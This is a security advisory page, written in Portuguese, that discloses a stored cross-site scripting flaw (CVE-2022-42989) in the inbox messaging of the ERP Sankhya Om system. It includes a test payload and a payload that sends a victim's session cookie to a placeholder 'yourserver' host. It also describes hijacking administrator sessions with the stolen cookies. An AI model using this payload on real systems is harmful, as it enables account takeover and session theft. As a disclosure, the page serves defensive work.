ERP Sankhya 4.13.x Cross Site Scripting

2022.10.26
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79

# Exploit Title: ERP Sankhya - XSS to Account Takeover # Google Dork: N/A # Date: 19/10/2022 # Exploit Author: Lucas Alves Da Cunha - (0xLucas) # Vendor Homepage: https://www.sankhya.com.br # Version: Sankhya Om <= 4.13.x # Tested on: Sankhya Om 4.11 # CVE: CVE-2022-42989 # Descrição: Um usuário comum no ERP Sankhya pode enviar uma mensagem para qualquer outro usuário do sistema inclusive administradores, através da função "Caixa de Entrada". No corpo da mensagem, podemos injetar códigos html/javascript levando para um cross site scripting. Payload para verificar existência da vulnerabilidade: <img src=1 onerror=alert(1)> Payload utilizado para capturar os dados da sessão do usuário: <img src=1 onerror=document.location="http://yourserver/?cookie="+document.cookie> # Passos para reprodução: 1 - Encontrando a funcionalidade: https://i.imgur.com/B9SWknH.png 2 - Enviando payload para verificar existência da vulnerabilidade: https://i.imgur.com/ZKSkLmx.png 2.1 - Vulnerabilidade comprovada: https://i.imgur.com/1KiAa1m.png 3 - Explorando a vulnerabilidade: https://i.imgur.com/n8Jevum.png 3.1 - Sessão capturada: https://i.imgur.com/aDatjyN.png Podemos utilizar os dados da sessão capturada e manipular a sessão utilizando a ferramenta: Cookie-Editor do Google Chrome, e assim entraremos na sessão do usuário desejado. Conforme a imagem a seguir: https://i.imgur.com/L10Yf9f.png # Impacto: Explorando essa vulnerabilidade, podemos comprometer qualquer conta de usuário do sistema, desde uma simples conta até mesmo uma conta de administrador do sistema, causando assim um grande impacto de negócio.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top